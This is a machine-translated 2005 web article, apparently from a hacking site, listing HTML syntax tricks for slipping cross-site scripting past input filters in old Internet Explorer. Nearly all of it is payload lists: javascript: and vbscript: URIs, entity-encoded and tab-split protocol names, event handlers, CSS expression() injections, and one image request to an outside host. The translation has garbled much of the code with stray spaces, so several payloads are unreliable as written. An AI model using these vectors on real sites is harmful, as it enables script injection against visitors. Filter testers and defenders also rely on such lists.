This page has been robot translated, sorry for typos if any. Original content here.

HTML syntax features

Creators: Algol , zFailure - latest changes 06/13/2005

One of the main methods of protecting sites from XSS vulnerabilities is the use of various filters for user-entered characters. This article describes the features of HTML syntax that allow you to bypass these filters.

It should be noted that XSS vulnerabilities are browser-dependent. All of the examples below were tested in IE6. In other versions or in other browsers, examples may also not work in any way. For example, the backslash character (`) is an attribute delimiter in IE only. Other browsers, such as Opera, for example, do not consider this symbol as a guardian.

  • Tag attribute delimiters.
    In addition to the space, the following characters are allowed: slash ( / ), tab, line feed. The delimiter is allowed to be omitted if the previous accessory is enclosed in quotation marks.
     <image / src = "1.png" / alt = "Hint" / border = "0">
     <image src = "1.png" alt = "Hint" border = "0">
     <image
     src = "1.png"
     alt = "Hint"
     border = "0">
     <image src = "1.png" alt = "Hint" border = "0">
    
  • Tag Attribute Limiters
    Values ​​are allowed to be enclosed in quotation marks (double and single) also in apostrophes, only the general is not allowed to be limited in any way.
     <image src = "" alt = "My hint is" border = "0">
     <image src = "" alt = 'My tooltip' border = "0">
     <image src = "" alt = `My hint` border =" 0 ">
     <image src = "" alt = Hint border = "0">
    
  • Character encodings
    The decryption of characters in the script occurs before it is executed:
      <img src = javascript: alert (& quot; ok & quot;)>
     <img src = javascript: alert (& # 039; ok & # 039;)>
     <img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 99 & # 114 & # 105 & # 112 & # 116 & # 58 & # 97 & # 108 & # 101 & # 114 & # 116 & # 40 & # 39 & # 111 & # 107 & # 39 & # 41>
     <a href=javascript:alert(%22ok%22)> click me </a> (only in the href attribute)
    
    
  • Script literal delimiters
     <img src = javascript: alert ('ok')>
     <img src = javascript: alert ("ok")>
     <img src = javascript: a = / ok /; alert (a.source)>
     <img src = javascript: alert (String.fromCharCode (111,107))>
    
  • Bypass filtering some characters
     <img src = javascript: i = new / ** / Image (); i.src = 'http: //bla.bla'> (replacing the space with / ** /)
     
  • Ways to run scripts
    Several ways to automatically run scripts:
      <script> alert ('ok') </script>
     <script src = 1.js> </script>
     <body onLoad = alert ('ok')>
     <meta http-equiv = Refresh content = 0; url = javascript: alert ('ok')>
     <image src = 1.png onload = alert ('ok')>
     <image src = javascript: alert ('ok')>
     <image src = "" onerror = alert ('ok')>
     <hr style = background: url (javascript: alert ('ok'))>
     <span style = top: expression (alert ('ok'))> </span>
     <span sss = "alert (); this.sss = null" style = top: expression (eval (this.sss));> </span> (only works once) <style type = "text / css"> @import url (javascript: alert ('ok')); </style>
     <object classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url value = javascript: alert ('ok')> </object>
     <embed src = javascript: alert ('ok'); this.avi>
     <embed src = javascript: alert ('ok'); this.wav>
     <iframe src = javascript: alert ('ok')> (only in IE) <a href=javascript:alert(%22ok%22)> click me </a> (launch only when clicking on the link) <a href = javascript: alert ('aaa' + eval ('alert (); i = 2 + 2') + 'bbb')> click me </a> (launch only when clicking on the link) <br SIZE = "& {alert ('XSS')} "> (Netscape 4.x only)
    
    
  • Various script protocols, ways to write them
      <img src = javascript: alert ()>
     <img src = vbscript: AleRt ()>
     <img src = JaVasCriPt: alert ()>
     <img src = "javascript: alert ()"> (spaces up to the word javascript)
     
     <img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 99 & # 114 & # 105 & # 112 & # 116: alert ()>
     <img src = javascript & # 9: alert ()>
     <img src = javascript & # 10: alert ()>
     <img src = javascript & # 13: alert ()>
     <img src = "javascript
     : alert () "> (before the colon - a tab character)
     
     <img src = "java
     scri
     pt: ale
     rt () "> (inside the javascript word - a tab character also a carriage return)
     
    
  • Insert scripts in style
    The script operators in the style attribute must be divided by " \; ".
     <hr style = `background: url (javascript: alert ('ok 1') \; alert ('ok 2'))`>
    
  • Special tags.
      <image src = "1.png" alt = "" border = "0"> (the img tag also image works the same way) <plaintext> (everything that moves later than this tag will be perceived as plain text - not HTML at all) <textarea> (everything that starts moving after this tag will be perceived as plain text - not HTML in any way) <xml> (everything that starts later than this tag will not be displayed in any way)
    
    
  • Table of frequently used codes:

    Symbol Decimal encoding 16th encoding * Character encoding URL encoding
    " & # 34 & # x22; & quot % 22
    '' & # 39 & # x27; % 27
    ` & # 96 & # x60; % 60
    <space> & # 32 & # x20; +
    <tab> &#9 & # x09; % 09
    <carriage return> &#13 & # x0D; % 0D
    = & # 61 & # x3D; % 3D
    < & # 60 & # x3C; & lt % 3C
    > & # 62 & # x3E; & gt % 3E
    \ & # 92 & # x5C; % 5C
    % & # 37 & # x25; % 25
    + & # 43 & # x2B; % 2B
    <short hyphen> & # 173 & # xAD; & shy % AD
    & & # 38 & # x26; & amp % 26

    * -in some cases, the semicolon can be omitted (if the character is at the end of the line, or several characters in this encoding go in a row).

    See similar: http://ha.ckers.org/xss.html
  • It will not be superfluous for your friends to learn this information, share an article with them!

    Comments Expand / collapse the comment window expand / collapse

    When commenting, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet changes not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.
    Liked? Subscribe to RSS news,
    to be the first to receive information
    about all the important events of the country and the world.
    You can also support shram.kiev.ua, click: